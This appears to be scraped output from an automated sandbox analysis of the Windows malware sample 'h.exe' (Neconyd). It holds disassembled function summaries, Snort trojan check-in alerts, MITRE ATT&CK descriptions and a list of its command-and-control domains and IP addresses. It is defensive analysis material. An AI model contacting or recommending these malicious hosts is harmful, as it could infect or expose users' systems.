Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: AllocString
String ID: "domain"$"url"
API String ID: 2525500382-2438671658
Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94

Uniqueness

Uniqueness Score: -1.00%

Function 00406C77 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 26registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91

Strings

SOFTWARE\Microsoft\Internet Explorer, xrefs: 00406C87
Build, xrefs: 00406CA6
w,@, xrefs: 00406CA0

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Open
String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
API String ID: 71445658-3061378640
Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040848F Relevance: 6.1, APIs: 4, Instructions: 81memoryregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
String ID:
API String ID: 3604167287-0
Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658

Uniqueness

Uniqueness Score: -1.00%

Function 00409581 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
CharLowerW.USER32(00408795), ref: 004095D8
SysFreeString.OLEAUT32(00408795), ref: 00409608
SysFreeString.OLEAUT32(00408E44), ref: 0040960D

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: CharFreeLowerString
String ID:
API String ID: 2335467167-0
Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44

Uniqueness

Uniqueness Score: -1.00%

Function 00408091 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3

Strings

-, xrefs: 00408140

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: -
API String ID: 885266447-2547889144
Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

Uniqueness

Uniqueness Score: -1.00%

Source: http://lousta.net/F.	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/92/650.htmlx;	Avira URL Cloud: Label: malware
Source: http://lousta.net/242/343.html	Avira URL Cloud: Label: malware
Source: http://lousta.net/763/735.htmlr-b	Avira URL Cloud: Label: malware
Source: http://mkkuei4kdsz.com/	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/92/650.html	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/S	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/T	Avira URL Cloud: Label: malware
Source: http://lousta.net/650/534.html	Avira URL Cloud: Label: malware
Source: http://lousta.net/	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/580/608.htmlE	Avira URL Cloud: Label: malware
Source: http://mkkuei4kdsz.com/569/916.html9	Avira URL Cloud: Label: malware
Source: http://mkkuei4kdsz.com/1EF8FD00309293F2C34F3L	Avira URL Cloud: Label: malware
Source: http://lousta.net/763/735.html$	Avira URL Cloud: Label: malware
Source: http://lousta.net/7/91.html	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/580/608.html	Avira URL Cloud: Label: malware
Source: http://lousta.net/876/244.html	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/580/608.html7	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/lousta.net	Avira URL Cloud: Label: malware
Source: http://lousta.net/763/735.html	Avira URL Cloud: Label: malware
Source: http://mkkuei4kdsz.com/569/916.html	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/92/650.htmlws	Avira URL Cloud: Label: malware
Source: http://lousta.net/7/91.htmla	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon	Avira URL Cloud: Label: malware
Source: http://lousta.net/763/735.htmlZ	Avira URL Cloud: Label: malware
Source: http://lousta.net/650/534.htmlr	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/580/608.htmlg	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/	Avira URL Cloud: Label: malware
Source: http://lousta.net/0	Avira URL Cloud: Label: malware
Source: http://mkkuei4kdsz.com/470/855.html	Avira URL Cloud: Label: malware
Source: http://lousta.net/763/735.htmlhtml	Avira URL Cloud: Label: malware
Source: http://mkkuei4kdsz.com/470/855.html-8a8d424fbe43573ef1HiLMEM	Avira URL Cloud: Label: malware
Source: http://lousta.net/763/735.html_-O	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/92/650.htmll;	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/580/608.htmlm	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/580/608.htmlk	Avira URL Cloud: Label: malware
Source: http://lousta.net/763/735.htmlH	Avira URL Cloud: Label: malware
Source: http://mkkuei4kdsz.com/569/916.html#	Avira URL Cloud: Label: malware

Source: lousta.net	Virustotal: Detection: 12%	Perma Link
Source: mkkuei4kdsz.com	Virustotal: Detection: 12%	Perma Link
Source: ow5dirasuek.com	Virustotal: Detection: 8%	Perma Link
Source: http://mkkuei4kdsz.com/	Virustotal: Detection: 12%	Perma Link
Source: http://ow5dirasuek.com/S	Virustotal: Detection: 8%	Perma Link
Source: http://lousta.net/	Virustotal: Detection: 12%	Perma Link
Source: http://ow5dirasuek.com/T	Virustotal: Detection: 6%	Perma Link
Source: http://lousta.net/650/534.html	Virustotal: Detection: 7%	Perma Link
Source: http://ow5dirasuek.com/92/650.html	Virustotal: Detection: 10%	Perma Link
Source: http://ow5dirasuek.com/580/608.html	Virustotal: Detection: 8%	Perma Link
Source: http://ow5dirasuek.com/lousta.net	Virustotal: Detection: 7%	Perma Link
Source: http://lousta.net/876/244.html	Virustotal: Detection: 14%	Perma Link
Source: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon	Virustotal: Detection: 6%	Perma Link
Source: http://lousta.net/763/735.html	Virustotal: Detection: 8%	Perma Link
Source: http://lousta.net/0	Virustotal: Detection: 14%	Perma Link
Source: http://mkkuei4kdsz.com/470/855.html	Virustotal: Detection: 13%	Perma Link
Source: http://ow5dirasuek.com/	Virustotal: Detection: 8%	Perma Link

Source: Traffic	Snort IDS: 2015786 ET TROJAN Ransom.Win32.Birele.gsg Checkin 192.168.2.7:49699 -> 193.166.255.171:80
Source: Traffic	Snort IDS: 2015786 ET TROJAN Ransom.Win32.Birele.gsg Checkin 192.168.2.7:49708 -> 64.225.91.73:80
Source: Traffic	Snort IDS: 2015786 ET TROJAN Ransom.Win32.Birele.gsg Checkin 192.168.2.7:49709 -> 34.41.229.245:80
Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.41.229.245:80 -> 192.168.2.7:49709
Source: Traffic	Snort IDS: 2015786 ET TROJAN Ransom.Win32.Birele.gsg Checkin 192.168.2.7:49713 -> 64.225.91.73:80

Source: Malware configuration extractor	URLs: http://ow5dirasuek.com/
Source: Malware configuration extractor	URLs: http://lousta.net/
Source: Malware configuration extractor	URLs: http://mkkuei4kdsz.com/

Source: Joe Sandbox View	IP Address: 64.225.91.73 64.225.91.73
Source: Joe Sandbox View	IP Address: 193.166.255.171 193.166.255.171
Source: Joe Sandbox View	IP Address: 193.166.255.171 193.166.255.171

Source: C:\Users\user\AppData\Roaming\omsecor.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Windows\SysWOW64\omsecor.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Source: C:\Users\user\AppData\Roaming\omsecor.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\omsecor.exe	Joe Sandbox ML: detected

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: FUNETASFI FUNETASFI
Source: Joe Sandbox View	ASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report h.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Neconyd

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\omsecor.exe

C:\Windows\SysWOW64\omsecor.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
h.exe

Function 004075D4 Relevance: 22.6, APIs: 15, Instructions: 128
filememoryCOMMON

Function 0040ABD9 Relevance: 3.0, APIs: 2, Instructions: 26
fileCOMMON

Function 0040B346 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 153
sleepfileCOMMON

Function 0040AC20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49
registryCOMMON

Function 0040AAFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42
COMMON

Function 00407727 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Function 004077F0 Relevance: 3.0, APIs: 2, Instructions: 30
processCOMMON

Function 004069C0 Relevance: 3.0, APIs: 2, Instructions: 25
registryCOMMON

Function 004039EA Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 163
memoryCOMMON

Function 004032B8 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 86
libraryloadermemoryCOMMON

Function 00402E3E Relevance: 26.6, APIs: 5, Strings: 10, Instructions: 309
COMMON

Function 0040B096 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 181
threadnetworkCOMMON

Function 00403C10 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 173
COMMON

Function 004027E6 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 355
comCOMMON

Function 004041E4 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 210
registrymemoryCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre